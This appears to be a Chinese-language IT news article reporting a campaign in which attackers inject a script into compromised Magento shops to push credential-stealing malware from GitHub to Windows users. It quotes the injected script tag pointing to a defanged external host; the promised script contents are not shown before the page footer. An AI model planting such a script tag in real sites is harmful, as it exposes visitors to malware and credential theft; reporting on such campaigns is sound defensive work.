技术栈

主页 > 网络 >

黑客利用GitHub将恶意软件推送至用户电脑以盗取凭据

技术栈 - 中国领先的IT技术门户

几个月前,我们曾发布了有关网络罪犯如何使用GitHub在被黑网站上加载各种加密货币矿工的报告文章。不幸的是即便如此,我们依然没能阻止网络罪犯们的脚步。如今,我们又发现了使用相同手法的网络犯罪活动。其主要目的是利用GitHub,将二进制信息窃取恶意软件悄无声息的推送至Windows用户的电脑上。

受感染的Magento网站

最近,识别了数百个受感染的Magento站点均被注入了以下的脚本:

<script type="text/javascript" data-src="https://bit.wo[.]tc/js/lib/js.js"></script>

该脚本( js.js)中的内容如下:

责任编辑:admin  二维码分享: